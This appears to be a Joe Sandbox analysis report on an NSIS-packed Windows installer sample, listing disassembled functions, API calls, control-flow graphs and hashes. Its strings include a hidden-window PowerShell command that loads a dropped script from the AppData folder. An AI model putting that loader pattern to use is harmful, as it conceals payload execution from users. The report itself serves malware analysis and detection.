96->51 100 403633-403636 96->100 97->96 98->74 104 403638-40363d call 40565b 100->104 105 40363f call 4056d8 100->105 110 403644-403652 SetCurrentDirectoryW 104->110 105->110 112 403654-40365a call 40602d 110->112 113 40365f-403688 call 40602d 110->113 112->113 117 40368d-4036a9 call 40604f DeleteFileW 113->117 120 4036ea-4036f2 117->120 121 4036ab-4036bb CopyFileW 117->121 120->117 122 4036f4-4036fb call 405ece 120->122 121->120 123 4036bd-4036dd call 405ece call 40604f call 40570d 121->123 122->51 123->120 132 4036df-4036e6 CloseHandle 123->132 132->120
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE ref: 004032A0
                                                                        • GetVersion.KERNEL32 ref: 004032A6
                                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032CF
                                                                        • #17.COMCTL32(00000007,00000009), ref: 004032F2
                                                                        • OleInitialize.OLE32(00000000), ref: 004032F9
                                                                        • SHGetFileInfoW.SHELL32(0079FEE0,00000000,?,000002B4,00000000), ref: 00403315
                                                                        • GetCommandLineW.KERNEL32(007A7A20,NSIS Error), ref: 0040332A
                                                                        • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Salmebogs(1).exe",00000000), ref: 0040333D
                                                                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Salmebogs(1).exe",00000020), ref: 00403364
                                                                          • Part of subcall function 00406407: GetModuleHandleA.KERNEL32(?,00000020,?,004032E6,00000009), ref: 00406419
                                                                          • Part of subcall function 00406407: GetProcAddress.KERNEL32(00000000,?), ref: 00406434
                                                                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040349E
                                                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034AF
                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034BB
                                                                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034CF
                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034D7
                                                                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004034E8
                                                                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004034F0
                                                                        • DeleteFileW.KERNELBASE(1033), ref: 00403504
                                                                          • Part of subcall function 0040602D: lstrcpynW.KERNEL32(?,?,00000400,0040332A,007A7A20,NSIS Error), ref: 0040603A
                                                                        • OleUninitialize.OLE32(?), ref: 004035CF
                                                                        • ExitProcess.KERNEL32 ref: 004035F0
                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Salmebogs(1).exe",00000000,?), ref: 00403603
                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Salmebogs(1).exe",00000000,?), ref: 00403612
                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Salmebogs(1).exe",00000000,?), ref: 0040361D
                                                                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Salmebogs(1).exe",00000000,?), ref: 00403629
                                                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403645
                                                                        • DeleteFileW.KERNEL32(0079F6E0,0079F6E0,?,powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medk,?), ref: 0040369F
                                                                        • CopyFileW.KERNEL32(007B6800,0079F6E0,00000001), ref: 004036B3
                                                                        • CloseHandle.KERNEL32(00000000,0079F6E0,0079F6E0,?,0079F6E0,00000000), ref: 004036E0
                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 0040370F
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00403716
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040372B
                                                                        • AdjustTokenPrivileges.ADVAPI32 ref: 0040374E
                                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403773
                                                                        • ExitProcess.KERNEL32 ref: 00403796
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                        • String ID: "C:\Users\user\Desktop\Salmebogs(1).exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede$C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medk$~nsu
                                                                        • API String ID: 2488574733-938877965
                                                                        • Opcode ID: 5956b3787460f83b7212b5421b84639116ad83eee396059e0d99c42d7c302169
                                                                        • Instruction ID: 3536812e4df2a44c8c6b6ea5987ae19e001d2543839af4c9b3a673e139b837ac
                                                                        • Opcode Fuzzy Hash: 5956b3787460f83b7212b5421b84639116ad83eee396059e0d99c42d7c302169
                                                                        • Instruction Fuzzy Hash: 79D1E5B0500311ABD720AF659D45A3B3EADEF8074AF11443EF581B62D2DB7D8E458B2E
                                                                        Function 004052CB Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 133 4052cb-4052e6 134 405475-40547c 133->134 135 4052ec-4053b3 GetDlgItem * 3 call 404126 call 404a29 GetClientRect GetSystemMetrics SendMessageW * 2 133->135 137 4054a6-4054b3 134->137 138 40547e-4054a0 GetDlgItem CreateThread CloseHandle 134->138 153 4053d1-4053d4 135->153 154 4053b5-4053cf SendMessageW * 2 135->154 139 4054d1-4054db 137->139 140 4054b5-4054bb 137->140 138->137 144 405531-405535 139->144 145 4054dd-4054e3 139->145 142 4054f6-4054ff call 404158 140->142 143 4054bd-4054cc ShowWindow * 2 call 404126 140->143 157 405504-405508 142->157 143->139 144->142 147 405537-40553d 144->147 149 4054e5-4054f1 call 4040ca 145->149 150 40550b-40551b ShowWindow 145->150 147->142 155 40553f-405552 SendMessageW 147->155 149->142 158 40552b-40552c call 4040ca 150->158 159 40551d-405526 call 40518c 150->159 160 4053e4-4053fb call 4040f1 153->160 161 4053d6-4053e2 SendMessageW 153->161 154->153 162 405654-405656 155->162 163 405558-405583 CreatePopupMenu call 40604f AppendMenuW 155->163 158->144 159->158 172 405431-405452 GetDlgItem SendMessageW 160->172 173 4053fd-405411 ShowWindow 160->173 161->160 162->157 170 405585-405595 GetWindowRect 163->170 171 405598-4055ad TrackPopupMenu 163->171 170->171 171->162 174 4055b3-4055ca 171->174 172->162 177 405458-405470 SendMessageW * 2 172->177 175 405420 173->175 176 405413-40541e ShowWindow 173->176 178 4055cf-4055ea SendMessageW 174->178 179 405426-40542c call 404126 175->179 176->179 177->162 178->178 180 4055ec-40560f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 178->180 179->172 182 405611-405638 SendMessageW 180->182 182->182 183 40563a-40564e GlobalUnlock SetClipboardData CloseClipboard 182->183 183->162
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,00000403), ref: 00405329
                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00405338
                                                                        • GetClientRect.USER32(?,?), ref: 00405375
                                                                        • GetSystemMetrics.USER32(00000002), ref: 0040537C
                                                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040539D
                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053AE
                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C1
                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053CF
                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053E2
                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405404
                                                                        • ShowWindow.USER32(?,00000008), ref: 00405418
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405439
                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405449
                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405462
                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040546E
                                                                        • GetDlgItem.USER32(?,000003F8), ref: 00405347
                                                                          • Part of subcall function 00404126: SendMessageW.USER32(00000028,?,00000001,00403F52), ref: 00404134
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 0040548B
                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_0000525F,00000000), ref: 00405499
                                                                        • CloseHandle.KERNELBASE(00000000), ref: 004054A0
                                                                        • ShowWindow.USER32(00000000), ref: 004054C4
                                                                        • ShowWindow.USER32(?,00000008), ref: 004054C9
                                                                        • ShowWindow.USER32(00000008), ref: 00405513
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405547
                                                                        • CreatePopupMenu.USER32 ref: 00405558
                                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040556C
                                                                        • GetWindowRect.USER32(?,?), ref: 0040558C
                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055A5
                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055DD
                                                                        • OpenClipboard.USER32(00000000), ref: 004055ED
                                                                        • EmptyClipboard.USER32 ref: 004055F3
                                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004055FF
                                                                        • GlobalLock.KERNEL32(00000000), ref: 00405609
                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040561D
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0040563D
                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405648
                                                                        • CloseClipboard.USER32 ref: 0040564E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                        • String ID: {
                                                                        • API String ID: 590372296-366298937
                                                                        • Opcode ID: c972e23c5202b0790fa1fe1b116619d8512481b1e7d1e62b87371190ceff57bc
                                                                        • Instruction ID: 0168b2d80d6e582db7c5dd4f4bcf68d2cf71ae59161b6f31601be7c89a1652ed
                                                                        • Opcode Fuzzy Hash: c972e23c5202b0790fa1fe1b116619d8512481b1e7d1e62b87371190ceff57bc
                                                                        • Instruction Fuzzy Hash: 10B148B1800608FFDB119F64DD89EAF7B79FB49355F00802AFA41BA1A0CB785A51DF58
                                                                        Function 0040604F Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 207stringCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 428 40604f-40605a 429 40605c-40606b 428->429 430 40606d-406083 428->430 429->430 431 406089-406096 430->431 432 40629b-4062a1 430->432 431->432 435 40609c-4060a3 431->435 433 4062a7-4062b2 432->433 434 4060a8-4060b5 432->434 436 4062b4-4062b8 call 40602d 433->436 437 4062bd-4062be 433->437 434->433 438 4060bb-4060c7 434->438 435->432 436->437 440 406288 438->440 441 4060cd-406109 438->441 442 406296-406299 440->442 443 40628a-406294 440->443 444 406229-40622d 441->444 445 40610f-40611a GetVersion 441->445 442->432 443->432 446 406262-406266 444->446 447 40622f-406233 444->447 448 406134 445->448 449 40611c-406120 445->449 454 406275-406286 lstrlenW 446->454 455 406268-406270 call 40604f 446->455 451 406243-406250 call 40602d 447->451 452 406235-406241 call 405f74 447->452 453 40613b-406142 448->453 449->448 450 406122-406126 449->450 450->448 456 406128-40612c 450->456 466 406255-40625e 451->466 452->466 458 406144-406146 453->458 459 406147-406149 453->459 454->432 455->454 456->448 462 40612e-406132 456->462 458->459 464 406185-406188 459->464 465 40614b-406171 call 405efa 459->465 462->453 469 406198-40619b 464->469 470 40618a-406196 GetSystemDirectoryW 464->470 477 406210-406214 465->477 478 406177-406180 call 40604f 465->478 466->454 468 406260 466->468 474 406221-406227 call 4062c1 468->474 471 406206-406208 469->471 472 40619d-4061ab GetWindowsDirectoryW 469->472 475 40620a-40620e 470->475 471->475 476 4061ad-4061b7 471->476 472->471 474->454 475->474 475->477 480 4061d1-4061e7 SHGetSpecialFolderLocation 476->480 481 4061b9-4061bc 476->481 477->474 483 406216-40621c lstrcatW 477->483 478->475 486 406202 480->486 487 4061e9-406200 SHGetPathFromIDListW CoTaskMemFree 480->487 481->480 485 4061be-4061c5 481->485 483->474 489 4061cd-4061cf 485->489 486->471 487->475 487->486 489->475 489->480
                                                                        APIs
                                                                        • GetVersion.KERNEL32(00000000,Completed,?,004051C3,Completed,00000000,00000000,007953FF), ref: 00406112
                                                                        • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 00406190
                                                                        • GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 004061A3
                                                                        • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004061DF
                                                                        • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 004061ED
                                                                        • CoTaskMemFree.OLE32(?), ref: 004061F8
                                                                        • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040621C
                                                                        • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004051C3,Completed,00000000,00000000,007953FF), ref: 00406276
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                        • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medk
                                                                        • API String ID: 900638850-1393529567
                                                                        • Opcode ID: 798394cd79efbf8b9b83d6ae683917ff9149f8dcce4e50bc544776fb700d76f6
                                                                        • Instruction ID: 0ce2904226638d20c34e96b955086165c79dcecb48fb9e3347e4958dd658327d
                                                                        • Opcode Fuzzy Hash: 798394cd79efbf8b9b83d6ae683917ff9149f8dcce4e50bc544776fb700d76f6
                                                                        • Instruction Fuzzy Hash: 1E612271A00501AADF20AF64DC44BAE37A4AF45314F12C17FE553BA2D1DB3D8AA2CB4D
                                                                        Function 00406370 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNELBASE(?,007A4F70,007A4728,00405B32,007A4728,007A4728,00000000,007A4728,007A4728, 4#v,?,C:\Users\user\AppData\Local\Temp\,0040583E,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 0040637B
                                                                        • FindClose.KERNEL32(00000000), ref: 00406387
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: Find$CloseFileFirst
                                                                        • String ID: pOz
                                                                        • API String ID: 2295610775-1820424874
                                                                        • Opcode ID: 86473a827e26f35012b0381fcf693fd2ef81f82e4a2ea800dcb2c6bd3b2c9d2b
                                                                        • Instruction ID: 60bd105d0d63f37bd19194ec34bd88d590bcf70de51275853e72dc5d4e23aedc
                                                                        • Opcode Fuzzy Hash: 86473a827e26f35012b0381fcf693fd2ef81f82e4a2ea800dcb2c6bd3b2c9d2b
                                                                        • Instruction Fuzzy Hash: 85D012715181209FC7001B786E0C84B7B58AF463717264F36F4AAF12E0CB789C628AE8
                                                                        Function 004027FB Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: FileFindFirst
                                                                        • String ID:
                                                                        • API String ID: 1974802433-0
                                                                        • Opcode ID: 8622cc97750de2e703821068ccc0f1fa31da9019a25ba4c249363bab9f371f68
                                                                        • Instruction ID: 8bff012c032b2cbcf9e7e912449e059cef7199700c9073f33937d0e239bdf0f9
                                                                        • Opcode Fuzzy Hash: 8622cc97750de2e703821068ccc0f1fa31da9019a25ba4c249363bab9f371f68
                                                                        • Instruction Fuzzy Hash: 38F082716001159BCB01EFA4DD49AAEB374EF00324F20457BE115F61D1D7B889409B29
                                                                        Function 00403C19 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 184 403c19-403c2b 185 403c31-403c37 184->185 186 403d6c-403d7b 184->186 185->186 187 403c3d-403c46 185->187 188 403dca-403ddf 186->188 189 403d7d-403dc5 GetDlgItem * 2 call 4040f1 SetClassLongW call 40140b 186->189 192 403c48-403c55 SetWindowPos 187->192 193 403c5b-403c5e 187->193 190 403de1-403de4 188->190 191 403e1f-403e24 call 40413d 188->191 189->188 195 403de6-403df1 call 401389 190->195 196 403e17-403e19 190->196 203 403e29-403e44 191->203 192->193 198 403c60-403c72 ShowWindow 193->198 199 403c78-403c7e 193->199 195->196 217 403df3-403e12 SendMessageW 195->217 196->191 202 4040be 196->202 198->199 204 403c80-403c95 DestroyWindow 199->204 205 403c9a-403c9d 199->205 210 4040c0-4040c7 202->210 208 403e46-403e48 call 40140b 203->208 209 403e4d-403e53 203->209 211 40409b-4040a1 204->211 213 403cb0-403cb6 205->213 214 403c9f-403cab SetWindowLongW 205->214 208->209 220 403e59-403e64 209->220 221 40407c-404095 DestroyWindow EndDialog 209->221 211->202 218 4040a3-4040a9 211->218 215 403d59-403d67 call 404158 213->215 216 403cbc-403ccd GetDlgItem 213->216 214->210 215->210 222 403cec-403cef 216->222 223 403ccf-403ce6 SendMessageW IsWindowEnabled 216->223 217->210 218->202 225 4040ab-4040b4 ShowWindow 218->225 220->221 226 403e6a-403eb7 call 40604f call 4040f1 * 3 GetDlgItem 220->226 221->211 227 403cf1-403cf2 222->227 228 403cf4-403cf7 222->228 223->202 223->222 225->202 254 403ec1-403efd ShowWindow KiUserCallbackDispatcher call 404113 EnableWindow 226->254 255 403eb9-403ebe 226->255 231 403d22-403d27 call 4040ca 227->231 232 403d05-403d0a 228->232 233 403cf9-403cff 228->233 231->215 236 403d40-403d53 SendMessageW 232->236 238 403d0c-403d12 232->238 233->236 237 403d01-403d03 233->237 236->215 237->231 242 403d14-403d1a call 40140b 238->242 243 403d29-403d32 call 40140b 238->243 252 403d20 242->252 243->215 251 403d34-403d3e 243->251 251->252 252->231 258 403f02 254->258 259 403eff-403f00 254->259 255->254 260 403f04-403f32 GetSystemMenu EnableMenuItem SendMessageW 258->260 259->260 261 403f34-403f45 SendMessageW 260->261 262 403f47 260->262 263 403f4d-403f8b call 404126 call 40602d lstrlenW call 40604f SetWindowTextW call 401389 261->263 262->263 263->203 272 403f91-403f93 263->272 272->203 273 403f99-403f9d 272->273 274 403fbc-403fd0 DestroyWindow 273->274 275 403f9f-403fa5 273->275 274->211 277 403fd6-404003 CreateDialogParamW 274->277 275->202 276 403fab-403fb1 275->276 276->203 278 403fb7 276->278 277->211 279 404009-404060 call 4040f1 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 277->279 278->202 279->202 284 404062-404075 ShowWindow call 40413d 279->284 286 40407a 284->286 286->211
                                                                        APIs
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C55
                                                                        • ShowWindow.USER32(?), ref: 00403C72
                                                                        • DestroyWindow.USER32 ref: 00403C86
                                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CA2
